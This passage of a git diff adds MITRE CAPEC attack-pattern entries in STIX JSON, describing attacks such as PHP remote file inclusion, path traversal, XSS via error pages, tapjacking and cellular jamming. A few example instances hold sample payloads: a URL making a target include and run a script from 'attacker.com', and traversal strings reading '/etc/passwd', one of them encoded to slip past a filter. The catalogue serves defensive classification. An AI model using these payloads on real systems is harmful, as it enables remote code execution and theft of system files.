impersonate a service provider in an e-business transaction. UDDI, ebXML, and similar standards are used to identify businesses in e-business transactions. Among other things, they identify a particular participant, WSDL information for SOAP transactions, and supported communication protocols, including security protocols. By spoofing one of these messages an attacker could impersonate a legitimate business in a transaction or could manipulate the protocols used between a client and business. This could result in disclosure of sensitive information, loss of message integrity, or even financial fraud.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/218.html", + "external_id": "CAPEC-218" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html", + "external_id": "CWE-345" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "The targeted business's UDDI or ebXML information must be served from a location that the attacker can spoof or compromise or the attacker must be able to intercept and modify unsecured UDDI/ebXML messages in transit." + ], + "x_capec_resources_required": [ + "The attacker must be able to force the target user to accept their spoofed UDDI or ebXML message as opposed to the a message associated with a legitimate company. Depending on the follow-on for the attack, the attacker may also need to serve its own web services." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--2c3069bb-826c-469e-a7be-57ade8c0b7b4.json b/capec/attack-pattern/attack-pattern--2c3069bb-826c-469e-a7be-57ade8c0b7b4.json new file mode 100644 index 0000000000..3c8d2af8ce --- /dev/null +++ b/capec/attack-pattern/attack-pattern--2c3069bb-826c-469e-a7be-57ade8c0b7b4.json @@ -0,0 +1,41 @@ +{ + "type": "bundle", + "id": "bundle--c9c7681e-0ab3-48ed-b0e6-a4116fe21f80", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--2c3069bb-826c-469e-a7be-57ade8c0b7b4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Cellular Jamming", + "description": "In this attack scenario, the attacker actively transmits signals to overpower and disrupt the communication between a cellular user device and a cell tower. Several existing techniques are known in the open literature for this attack for 2G, 3G, and 4G LTE cellular technology. For example, some attacks target cell towers by overwhelming them with false status messages, while others introduce high levels of noise on signaling channels.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/605.html", + "external_id": "CAPEC-605" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (The attacker's goal is to prevent users from accessing the cellular network. Denying connectivity to the cellular network prevents the user from being able to transmit or receive any data, which also prevents VOIP calls, however this attack poses no threat to data confidentiality.)" + ] + }, + "x_capec_prerequisites": [ + "Lack of anti-jam features in cellular technology (2G, 3G, 4G, LTE)" + ], + "x_capec_skills_required": { + "Low": "This attack can be performed by low capability attackers with commercially available tools." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--2cd72ff3-e4df-4b86-ad84-5d4ace9f3ab7.json b/capec/attack-pattern/attack-pattern--2cd72ff3-e4df-4b86-ad84-5d4ace9f3ab7.json new file mode 100644 index 0000000000..e7fbe5ed95 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--2cd72ff3-e4df-4b86-ad84-5d4ace9f3ab7.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--ccbddb41-6408-4a46-95e0-7697586023d5", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--2cd72ff3-e4df-4b86-ad84-5d4ace9f3ab7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Malicious Logic Insertion via Counterfeit Hardware", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-452 : Malicious Logic Insertion into Product Hardware. Please refer to this other pattern going forward.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/453.html", + "external_id": "CAPEC-453" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--2cee1dd8-0815-4116-8e4a-14b43e9d8463.json b/capec/attack-pattern/attack-pattern--2cee1dd8-0815-4116-8e4a-14b43e9d8463.json new file mode 100644 index 0000000000..cc4b743a6f --- /dev/null +++ b/capec/attack-pattern/attack-pattern--2cee1dd8-0815-4116-8e4a-14b43e9d8463.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--f3d47174-e694-4a8c-8924-8ba263de3712", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--2cee1dd8-0815-4116-8e4a-14b43e9d8463", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "XSS Targeting Error Pages", + "description": "An adversary distributes a link (or possibly some other query structure) with a request to a third party web server that is malformed and also contains a block of exploit code in order to have the exploit become live code in the resulting error page. When the third party web server receives the crafted request and notes the error it then creates an error message that echoes the malformed message, including the exploit. Doing this converts the exploit portion of the message into to valid language elements that are executed by the viewing browser. When a victim executes the query provided by the attacker the infected error message error message is returned including the exploit code which then runs in the victim's browser. XSS can result in execution of code as well as data leakage (e.g. session cookies can be sent to the attacker). This type of attack is especially dangerous since the exploit appears to come from the third party web server, who the victim may trust and hence be more vulnerable to deception.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/198.html", + "external_id": "CAPEC-198" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/81.html", + "external_id": "CWE-81" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "A third party web server which fails to adequately sanitize messages sent in error pages.", + "The victim must be made to execute a query crafted by the attacker which results in the infected error report." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--2d4f8222-023b-42ef-9b7f-eef0e7a105b7.json b/capec/attack-pattern/attack-pattern--2d4f8222-023b-42ef-9b7f-eef0e7a105b7.json new file mode 100644 index 0000000000..addff9d0f0 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--2d4f8222-023b-42ef-9b7f-eef0e7a105b7.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--f81908a4-1fe4-4cb9-b330-ca1a1ee94a6b", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--2d4f8222-023b-42ef-9b7f-eef0e7a105b7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Altered Installed BIOS", + "description": "An attacker with access to download and update system software sends a maliciously altered BIOS to the victim or victim supplier/integrator, which when installed allows for future exploitation.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/532.html", + "external_id": "CAPEC-532" + }, + { + "source_name": "reference_from_CAPEC", + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf", + "external_id": "REF-439" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "An attacker compromises the download and update portion of a manufacturer's web presence, and develops a malicious BIOS that in addition to the normal functionality will also at a specific time of day disable the remote access subsystem's security checks. The malicious BIOS is put in place on the manufacturer's website, the victim location is sent an official-looking email informing the victim of the availability of a new BIOS with bug fixes and enhanced performance capabilities to entice the victim to install the new BIOS quickly. The malicious BIOS is downloaded and installed on the victim's system, which allows for additional compromise by the attacker." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge about the installed target system design.", + "Advanced knowledge about the download and update installation processes.", + "Access to the download and update system(s) used to deliver BIOS images." + ], + "x_capec_skills_required": { + "High": "Able to develop a malicious BIOS image with the original functionality as a normal BIOS image, but with added functionality that allows for later compromise and/or disruption." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--2d50280d-8c0c-46e3-9397-c46d577cff93.json b/capec/attack-pattern/attack-pattern--2d50280d-8c0c-46e3-9397-c46d577cff93.json new file mode 100644 index 0000000000..facc027d14 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--2d50280d-8c0c-46e3-9397-c46d577cff93.json @@ -0,0 +1,85 @@ +{ + "type": "bundle", + "id": "bundle--58984211-bdee-451d-af62-3e7eea8974e1", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--2d50280d-8c0c-46e3-9397-c46d577cff93", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "iFrame Overlay", + "description": "In an iFrame overlay attack the victim is tricked into unknowingly initiating some action in one system while interacting with the UI from seemingly completely different system. While being logged in to some target system, the victim visits the attackers' malicious site which displays a UI that the victim wishes to interact with. In reality, the iFrame overlay page has a transparent layer above the visible UI with action controls that the attacker wishes the victim to execute. The victim clicks on buttons or other UI elements they see on the page which actually triggers the action controls in the transparent overlaying layer. Depending on what that action control is, the attacker may have just tricked the victim into executing some potentially privileged (and most undesired) functionality in the target system to which the victim is authenticated. The basic problem here is that there is a dichotomy between what the victim thinks he or she is clicking on versus what he or she is actually clicking on.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/222.html", + "external_id": "CAPEC-222" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html", + "external_id": "CWE-1021" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Michal Zalewski, Browser Security Handbook, 2008, Google Inc.", + "url": "https://code.google.com/archive/p/browsersec/wikis/Main.wiki", + "external_id": "REF-84" + }, + { + "source_name": "reference_from_CAPEC", + "description": "M. Mahemoff, Explaining the \"Don't Click\" Clickjacking Tweetbomb, 2009--02---12, Software As She's Developed", + "url": "http://softwareas.com/explaining-the-dont-click-clickjacking-tweetbomb", + "external_id": "REF-85" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "The following example is a real-world iFrame overlay attack [2]. In this attack, the malicious page embeds Twitter.com on a transparent IFRAME. The status-message field is initialized with the URL of the malicious page itself. To provoke the click, which is necessary to publish the entry, the malicious page displays a button labeled \"Don't Click.\" This button is aligned with the invisible \"Update\" button of Twitter. Once the user performs the click, the status message (i.e., a link to the malicious page itself) is posted to his/ her Twitter profile." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The victim is communicating with the target application via a web based UI and not a thick client. The victim's browser security policies allow iFrames. The victim uses a modern browser that supports UI elements like clickable buttons (i.e. not using an old text only browser). The victim has an active session with the target system. The target system's interaction window is open in the victim's browser and supports the ability for initiating sensitive actions on behalf of the user in the target system." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "Crafting the proper malicious site and luring the victim to this site is not a trivial task." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--2d7b12ba-47d5-4617-be01-dfa415317b93.json b/capec/attack-pattern/attack-pattern--2d7b12ba-47d5-4617-be01-dfa415317b93.json new file mode 100644 index 0000000000..37cdcd48dc --- /dev/null +++ b/capec/attack-pattern/attack-pattern--2d7b12ba-47d5-4617-be01-dfa415317b93.json @@ -0,0 +1,103 @@ +{ + "type": "bundle", + "id": "bundle--1cd57813-abac-4e4b-8fd7-6788d2dcf72d", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--2d7b12ba-47d5-4617-be01-dfa415317b93", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "PHP Remote File Inclusion", + "description": "In this pattern the adversary is able to load and execute arbitrary code remotely available from the application. This is usually accomplished through an insecurely configured PHP runtime environment and an improperly sanitized \"include\" or \"require\" call, which the user can then control to point to any web-accessible file. This allows adversaries to hijack the targeted application and force it to execute their own instructions.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/193.html", + "external_id": "CAPEC-193" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/98.html", + "external_id": "CWE-98" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/80.html", + "external_id": "CWE-80" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/714.html", + "external_id": "CWE-714" + }, + { + "source_name": "reference_from_CAPEC", + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "url": "http://projects.webappsec.org/Remote-File-Inclusion", + "external_id": "REF-59" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Shaun Clowes, A Study In Scarlet, Exploiting Common Vulnerabilities in PHP Applications, Blackhat Briefings Asia 2001", + "url": "http://securereality.com.au/studyinscarlett/", + "external_id": "REF-60" + }, + { + "source_name": "reference_from_CAPEC", + "description": "OWASP Top 10 (2007), The Open Web Application Security Project (OWASP)", + "url": "http://www.owasp.org/index.php/Top_10_2007-A3", + "external_id": "REF-45" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "\n \n \n The adversary controls a PHP script on a server \"http://attacker.com/rfi.txt\"\n The .txt extension is given so that the script doesn't get executed by the attacker.com server, and it will be downloaded as text. The target application is vulnerable to PHP remote file inclusion as following: include($_GET['filename'] . '.txt')\n The adversary creates an HTTP request that passes his own script in the include: http://example.com/file.php?filename=http://attacker.com/rfi with the concatenation of the \".txt\" prefix, the PHP runtime download the attack's script and the content of the script gets executed in the same context as the rest of the original script.\n \n \n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target application server must allow remote files to be included in the \"require\", \"include\", etc. PHP directives", + "The adversary must have the ability to make HTTP requests to the target web application." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "To inject the malicious payload in a web page", + "Medium": "To bypass filters in the application" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--2e72ce44-c580-471c-a9ac-6e6a600b67b2.json b/capec/attack-pattern/attack-pattern--2e72ce44-c580-471c-a9ac-6e6a600b67b2.json new file mode 100644 index 0000000000..f9d753dcb6 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--2e72ce44-c580-471c-a9ac-6e6a600b67b2.json @@ -0,0 +1,81 @@ +{ + "type": "bundle", + "id": "bundle--c00b19b5-e532-45a8-8a3d-80269b9993b6", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--2e72ce44-c580-471c-a9ac-6e6a600b67b2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Relative Path Traversal", + "description": "An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \\) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/139.html", + "external_id": "CAPEC-139" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/23.html", + "external_id": "CWE-23" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The OWASP Application Security Desk Reference, 2009, The Open Web Application Security Project (OWASP)", + "url": "https://www.owasp.org/index.php/Path_Traversal", + "external_id": "REF-8" + }, + { + "source_name": "reference_from_CAPEC", + "description": "OWASP Testing Guide (v3), 2010, The Open Web Application Security Project (OWASP)", + "url": "https://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001)", + "external_id": "REF-9" + }, + { + "source_name": "reference_from_CAPEC", + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "url": "http://projects.webappsec.org/w/page/13246952/Path-Traversal", + "external_id": "REF-10" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "\n The attacker uses relative path traversal to access files in the application. This is an example of accessing user's password file.\n http://www.example.com/getProfile.jsp?filename=../../../../etc/passwd\n However, the target application employs regular expressions to make sure no relative path sequences are being passed through the application to the web page. The application would replace all matches from this regex with the empty string.\n Then an attacker creates special payloads to bypass this filter:\n http://www.example.com/getProfile.jsp?filename=%2e%2e/%2e%2e/%2e%2e/%2e%2e /etc/passwd\n When the application gets this input string, it will be the desired vector by the attacker.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target application must accept a string as user input, fail to sanitize combinations of characters in the input that have a special meaning in the context of path navigation, and insert the user-supplied string into path navigation commands." + ], + "x_capec_skills_required": { + "High": "To bypass non trivial filters in the application", + "Low": "To inject the malicious payload in a web page" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--2e8b387c-3490-4037-be54-cdd3b2897393.json b/capec/attack-pattern/attack-pattern--2e8b387c-3490-4037-be54-cdd3b2897393.json new file mode 100644 index 0000000000..ec818dd73c --- /dev/null +++ b/capec/attack-pattern/attack-pattern--2e8b387c-3490-4037-be54-cdd3b2897393.json @@ -0,0 +1,80 @@ +{ + "type": "bundle", + "id": "bundle--e1bb45f2-2c5d-4dab-a459-71cb25c6e6cb", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--2e8b387c-3490-4037-be54-cdd3b2897393", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "ICMP Error Message Echoing Integrity Probe", + "description": "An adversary uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target and then analyze the integrity of data returned or \"Quoted\" from the originating request that generated the error message. For this purpose \"Port Unreachable\" error messages are often used, as generating them requires the attacker to send a UDP datagram to a closed port on the target. When replying with an ICMP error message some IP/ICMP stack implementations change aspects of the IP header, change or reverse certain byte orders, reset certain field values to default values which differ between operating system and firmware implementations, and make other changes. Some IP/ICMP stacks are decidedly broken, indicating an idiosyncratic behavior that differs from the RFC specifications, such as the case when miscalculations affect a field value. A tremendous amount of information about the host operating system can be deduced from its 'echoing' characteristics. Notably, inspection of key protocol header fields, including the echoed header fields of the encapsulating protocol can yield a wealth of data about the host operating system or firmware version.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/330.html", + "external_id": "CAPEC-330" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc792.html", + "external_id": "REF-123" + }, + { + "source_name": "reference_from_CAPEC", + "description": "R. Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10", + "url": "http://www.faqs.org/rfcs/rfc1122.html", + "external_id": "REF-124" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Ofir Arkin, A Remote Active OS Fingerprinting Tool using ICMP, 2002--04, The Sys-Security Group", + "url": "http://ofirarkin.files.wordpress.com/2008/11/login.pdf", + "external_id": "REF-262" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \"Port Unreachable.." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--2ebcd4aa-44ae-47e0-9c76-c99c71990a09.json b/capec/attack-pattern/attack-pattern--2ebcd4aa-44ae-47e0-9c76-c99c71990a09.json new file mode 100644 index 0000000000..7c482b7a70 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--2ebcd4aa-44ae-47e0-9c76-c99c71990a09.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--6bf0912c-e4ee-4fc3-b4b7-aed63e9f1a47", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--2ebcd4aa-44ae-47e0-9c76-c99c71990a09", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "XML Flood", + "description": "An adversary may execute a flooding attack using XML messages with the intent to deny legitimate users access to a web service. These attacks are accomplished by sending a large number of XML based requests and letting the service attempt to parse each one. In many cases this type of an attack will result in a XML Denial of Service (XDoS) due to an application becoming unstable, freezing, or crashing. XDoS is most closely associated with web services, SOAP, and Rest, because remote service requesters can post malicious XML payloads to the service provider designed to exhaust the service provider's memory, CPU, and/or disk space. The main weakness in XDoS is that the service provider generally must inspect, parse, and validate the XML messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that XDoS targets. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/528.html", + "external_id": "CAPEC-528" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html", + "external_id": "CWE-770" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "XML Denial of Service (XML DoS)" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption" + ] + }, + "x_capec_example_instances": [ + "Consider the case of attack performed against the createCustomerBillingAccount Web Service for an online store. In this case, the createCustomerBillingAccount Web Service receives a huge number of simultaneous requests, containing nonsense billing account creation information (the small XML messages). The createCustomerBillingAccount Web Services may forward the messages to other Web Services for processing. The application suffers from a high load of requests, potentially leading to a complete loss of availability the involved Web Service." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target must receive and process XML transactions.", + "An adverssary must possess the ability to generate a large amount of XML based messages to send to the target service." + ], + "x_capec_skills_required": { + "Low": "Denial of service" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--2f180ce8-8a86-4a6f-9e86-85173b34e813.json b/capec/attack-pattern/attack-pattern--2f180ce8-8a86-4a6f-9e86-85173b34e813.json new file mode 100644 index 0000000000..0529020bf9 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--2f180ce8-8a86-4a6f-9e86-85173b34e813.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--2cd52f74-4849-4d77-b128-312111cd19e5", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--2f180ce8-8a86-4a6f-9e86-85173b34e813", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Tapjacking", + "description": "An adversary, through a previously installed malicious application, displays an interface that misleads the user and convinces him/her to tap on an attacker desired location on the screen. This is often accomplished by overlaying one screen on top of another while giving the appearance of a single interface. There are two main techniques used to accomplish this. The first is to leverage transparent properties that allow taps on the screen to pass through the visible application to an application running in the background. The second is to strategically place a small object (e.g., a button or text field) on top of the visible screen and make it appear to be a part of the underlying application. In both cases, the user is convinced to tap on the screen but does not realize the application that they are interacting with.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/506.html", + "external_id": "CAPEC-506" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html", + "external_id": "CWE-1021" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Marcus Niemietz, Jorg Schwenk, UI Redressing Attacks on Android Devices, 2012, Horst Gortz Institute for IT-Security", + "url": "https://media.blackhat.com/ad-12/Niemietz/bh-ad-12-androidmarcus_niemietz-WP.pdf", + "external_id": "REF-436" + }, + { + "source_name": "reference_from_CAPEC", + "description": "David Richardson, Look-10-007 - Tapjacking, 2010, Lookout Mobile Security", + "url": "https://blog.lookout.com/look-10-007-tapjacking/", + "external_id": "REF-437" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "This pattern of attack requires the ability to execute a malicious application on the user's device. This malicious application is used to present the interface to the user and make the attack possible." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--2f851176-9695-467e-bfd6-6ef0b5a2625f.json b/capec/attack-pattern/attack-pattern--2f851176-9695-467e-bfd6-6ef0b5a2625f.json new file mode 100644 index 0000000000..691501334b --- /dev/null +++ b/capec/attack-pattern/attack-pattern--2f851176-9695-467e-bfd6-6ef0b5a2625f.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--dd4f5719-2266-4463-9d4d-db849c969a0f", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--2f851176-9695-467e-bfd6-6ef0b5a2625f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Manipulation During Distribution", + "description": "An attacker undermines the integrity of a product, software, or technology at some stage of the distribution channel. The core threat of modification or manipulation during distribution arise from the many stages of distribution, as a product may traverse multiple suppliers and integrators as the final asset is delivered. Components and services provided from a manufacturer to a supplier may be tampered with during integration or packaging.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/439.html", + "external_id": 